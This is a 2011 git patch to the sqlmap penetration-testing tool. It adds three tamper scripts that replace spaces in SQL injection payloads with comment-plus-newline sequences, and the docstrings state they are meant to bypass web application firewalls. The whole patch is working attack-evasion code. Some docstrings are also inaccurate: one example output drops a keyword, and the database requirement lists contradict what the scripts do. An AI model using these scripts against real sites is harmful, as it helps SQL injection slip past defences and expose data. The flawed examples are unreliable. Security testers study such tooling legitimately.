From 5f08b90b6c9c6b41827fc3e7a37cb44c8acb84f0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 3 Nov 2011 16:04:34 +0000
Subject: [PATCH] commiting new tampering scripts contributed by Roberto
 Salgado

---
 doc/THANKS                |  2 +-
 tamper/space2dash.py      | 54 +++++++++++++++++++++++++++++++++++++++
 tamper/space2mssqlhash.py | 47 ++++++++++++++++++++++++++++++++++
 tamper/space2mysqldash.py | 52 +++++++++++++++++++++++++++++++++++++
 4 files changed, 154 insertions(+), 1 deletion(-)
 create mode 100644 tamper/space2dash.py
 create mode 100644 tamper/space2mssqlhash.py
 create mode 100644 tamper/space2mysqldash.py

diff --git a/doc/THANKS b/doc/THANKS
index a85d03d0e..f952efb48 100644
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -436,7 +436,7 @@ Tomoyuki Sakurai <cherry@trombik.org>
     for submitting to the FreeBSD project the sqlmap 0.5 port
 
 Roberto Salgado <lightos@gmail.com>
-    for contributing several tamper scripts
+    for contributing considerable amount of tamper scripts
 
 Pedro Jacques Santos Santiago <pedro__jacques@hotmail.com>
     for reporting considerable amount of bugs
diff --git a/tamper/space2dash.py b/tamper/space2dash.py
new file mode 100644
index 000000000..5464a1eca
--- /dev/null
+++ b/tamper/space2dash.py
@@ -0,0 +1,54 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import random
+import string
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload):
+    """
+    Replaces space character (' ') with a dash comment ('--') followed by
+    a random string and a new line ('\n')
+
+    Example:
+        * Input: 1 AND 9227=9227
+        * Output: 1--PTTmJopxdWJ%0AAND--cWfcVRPV%0A9227=9227
+
+    Requirement:
+        * MSSQL
+        * SQLite
+
+    Tested against:
+
+    Notes:
+        * Useful to bypass several web application firewalls
+        * Used during the ZeroNights SQL injection challenge,
+          https://proton.onsec.ru/contest/
+    """
+
+    retVal = ""
+
+    if payload:
+        for i in xrange(len(payload)):
+            if payload[i].isspace():
+                randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12)))
+                retVal += "--%s%%0A" % randomStr
+            elif payload[i] == '#' or payload[i:i+3] == '-- ':
+                retVal += payload[i:]
+                break
+            else:
+                retVal += payload[i]
+
+    return retVal
diff --git a/tamper/space2mssqlhash.py b/tamper/space2mssqlhash.py
new file mode 100644
index 000000000..a0917f3a5
--- /dev/null
+++ b/tamper/space2mssqlhash.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload):
+    """
+    Replaces space character (' ') with a pound character ('#') followed by
+    a new line ('\n')
+
+    Example:
+        * Input: 1 AND 9227=9227
+        * Output: 1%23%0A9227=9227
+
+    Requirement:
+        * MSSQL
+	* MySQL
+
+    Notes:
+        * Useful to bypass several web application firewalls
+    """
+
+    retVal = ""
+
+    if payload:
+        for i in xrange(len(payload)):
+            if payload[i].isspace():
+                retVal += "%23%0A"
+            elif payload[i] == '#' or payload[i:i+3] == '-- ':
+                retVal += payload[i:]
+                break
+            else:
+                retVal += payload[i]
+
+    return retVal
diff --git a/tamper/space2mysqldash.py b/tamper/space2mysqldash.py
new file mode 100644
index 000000000..cd13aeb7c
--- /dev/null
+++ b/tamper/space2mysqldash.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
+
+def tamper(payload):
+    """
+    Replaces space character (' ') with a dash comment ('--') followed by
+    a new line ('\n')
+
+    Example:
+        * Input: 1 AND 9227=9227
+        * Output: 1--%0AAND--%0A9227=9227
+
+    Requirement:
+        * MySQL
+        * MSSQL
+
+    Tested against:
+
+    Notes:
+        * Useful to bypass several web application firewalls.
+    """
+
+    retVal = ""
+
+    if payload:
+        for i in xrange(len(payload)):
+            if payload[i].isspace():
+                retVal += "--%0A"
+            elif payload[i] == '#' or payload[i:i+3] == '-- ':
+                retVal += payload[i:]
+                break
+            else:
+                retVal += payload[i]
+
+    return retVal